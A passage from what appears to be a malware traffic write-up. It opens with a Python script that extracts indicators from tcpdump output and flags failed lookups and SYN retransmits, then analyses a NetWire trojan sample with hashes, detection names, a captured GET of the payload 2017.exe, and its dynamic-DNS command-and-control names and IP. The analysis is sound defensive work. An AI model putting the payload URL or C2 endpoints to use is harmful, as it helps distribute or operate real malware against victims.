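                r.update(method=h["method"], path=h["path"])
        elif (u := UDP.match(r["rest"])):
            r.update(kind="udp", length=int(u["length"]))
        recs.append(r)
    return recs

def base_name(name):  # strip the suffix the Windows resolver appends once the bare name fails
    return name[: -len(SEARCH_SUFFIX) - 1] if name.endswith("." + SEARCH_SUFFIX) else name

def is_teredo_rs(r):  # Teredo router solicitation: 13-byte auth header + 40 IPv6 + 8 ICMPv6 = 61 bytes
    return r["kind"] == "udp" and r["dport"] == 3544 and r["length"] == 61

def is_background(r):  # traffic the Windows host generates on its own, not an indicator of the sample
    return is_teredo_rs(r) or (r["kind"] == "dns" and r["name"].endswith(TELEMETRY))

def dns_lookup_failures(recs):
    """Names asked for more than once: re-sent, sent to the alternate resolver, or suffix-appended."""
    counts = Counter(base_name(r["name"]) for r in recs if r["kind"] == "dns" and not is_background(r))
    return {name: n for name, n in counts.items() if n > 1}

def syn_retransmits(recs):
    """Identical SYNs (same socket, same ISN) mean no SYN-ACK was accepted in between."""
    seen = Counter((r["sport"], r["dst"], r["dport"], r["seq"])
                   for r in recs if r["kind"] == "tcp" and r["flags"] == "S")
    return {key: n for key, n in seen.items() if n > 1}

def syn_fanout(recs, window_s=1.0, min_targets=4):
    """SYNs to many distinct hosts inside one fixed window: list-driven probing, not browsing."""
    buckets = defaultdict(set)
    for r in recs:
        if r["kind"] == "tcp" and r["flags"] == "S":
            buckets[int(r["ts"].timestamp() // window_s)].add(r["dst"])
    return {b: sorted(t) for b, t in buckets.items() if len(t) >= min_targets}

def post_body_bytes(segment_len, header_lines):
    """Declared Content-Length versus the bytes the segment actually carries after CRLF CRLF."""
    head = "\r\n".join(header_lines) + "\r\n\r\n"
    declared = next(int(h.split(":", 1)[1]) for h in header_lines if h.lower().startswith("content-length:"))
    return declared, segment_len - len(head.encode())

def iocs(recs):
    """Names and HTTP requests left once the background traffic is removed."""
    out = set()
    for r in recs:
        if r["kind"] == "dns" and not is_background(r):
            out.add(base_name(r["name"]))
        elif r.get("method"):
            out.add(f"{r['method']} {r['dst']}:{r['dport']}{r['path']}")
    return sorted(out)

if __name__ == "__main__":
    recs = parse(SAMPLE)
    print(iocs(recs), dns_lookup_failures(recs), syn_retransmits(recs), syn_fanout(recs),
          post_body_bytes(428, POST_HEADERS), sep="\n")
```

Run against a full capture, feed it the output of tcpdump -n -tttt (without -A) so every line is a summary line; the fixed one-second buckets in syn_fanout are deliberately simple and will split a burst that straddles a second boundary, which is acceptable for a first pass but not for a production detector.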


Netwire Wirenet Trojan Downloader Malware 2017.exe PCAP file download traffic analysis

SHA256: 26989aa946a3c511b62b809bb98c2c7cf947ca5bfad628873ab3f6b94297b7d1
File name: 2017.exe
Detection ratio: 34 / 57
Analysis date: 2017-02-20 02:14:31 UTC
AVG Autoit2_c.ACFW 20170220
AVware Trojan.Win32.Generic!BT 20170219
Ad-Aware Trojan.GenericKD.4425869 20170220
AegisLab Troj.W32.Gen.m5cP 20170220
Antiy-AVL Trojan/Generic.ASVCS3S.1E5 20170220
Arcabit Trojan.Generic.D43888D 20170220
Avira (no cloud) DR/Autoit.yobkp 20170219
BitDefender Trojan.GenericKD.4425869 20170219
Bkav W32.HfsAtITIST.FAB9 20170218
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130
Cyren W32/Trojan.ICBN-4514 20170220
DrWeb BackDoor.Wirenet.187 20170220

Troj/Netwire-GZ

Category: Viruses and Spyware
Type: Trojan
Protection available since: 07 Oct 2016 15:58:11 (GMT)
Last Updated: 07 Oct 2016 15:58:11 (GMT)
Troj/Netwire-GZ exhibits the following characteristics:

File Information

Size
283K
SHA-1
d57e5c3b764a3a33a3e069b78794cc91a39805f8
MD5
64032694f59a03659420f6205852c662
CRC-32
e9e62086
File type
application/x-ms-dos-executable
First seen
2016-10-06

Runtime Analysis

HTTP Requests
  • http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt
DNS Requests
  • myfilesareok.ddns.net

 

 

2017-02-18 07:59:44.911543 IP 192.168.1.102.56166 > 192.185.145.173.80: Flags [P.], seq 0:298, ack 1, win 256, length 298: HTTP: GET /includes/2017.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: peruvianflavor.com
Connection: Keep-Alive

AVG and Avira name the file as AutoIt, i.e. an AutoIt-compiled wrapper around the NetWire payload that DrWeb identifies. The sample resolves myfilesareok.ddns.net (the same name Sophos recorded) and immediately tries 163.47.20.42 on the high port 64536: three separate connection attempts, each SYN retransmitted twice about 0.75 s apart, the last without the window-scale option, with no SYN-ACK seen, after which it resolves a second dynamic-DNS name, 2017blessed.ddns.net. The authrootseq.txt request in Sophos' list is Windows' automatic root-certificate update check, not the sample's own command channel, and the UDP/3544 packet is Teredo as in the other captures.

2017-02-18 07:59:56.033673 IP 192.168.1.102.54470 > 75.75.75.75.53: 53705+ A? myfilesareok.ddns.net. (39)
2017-02-18 07:59:56.069943 IP 192.168.1.102.56167 > 163.47.20.42.64536: Flags [S], seq 81464738, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:59:56.813999 IP 192.168.1.102.56167 > 163.47.20.42.64536: Flags [S], seq 81464738, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:59:57.556733 IP 192.168.1.102.56167 > 163.47.20.42.64536: Flags [S], seq 81464738, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 07:59:58.269823 IP 192.168.1.102.56168 > 163.47.20.42.64536: Flags [S], seq 394358472, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:59:59.011302 IP 192.168.1.102.56168 > 163.47.20.42.64536: Flags [S], seq 394358472, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:59:59.750831 IP 192.168.1.102.56168 > 163.47.20.42.64536: Flags [S], seq 394358472, win 65535, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 08:00:00.347129 IP 192.168.1.102.56169 > 163.47.20.42.64536: Flags [S], seq 4005154394, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 08:00:01.086048 IP 192.168.1.102.56169 > 163.47.20.42.64536: Flags [S], seq 4005154394, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 08:00:01.827107 IP 192.168.1.102.56169 > 163.47.20.42.64536: Flags [S], seq 4005154394, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 08:00:11.454984 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 08:00:12.068271 IP 192.168.1.102.54471 > 75.75.75.75.53: 30946+ A? 2017blessed.ddns.net. (38)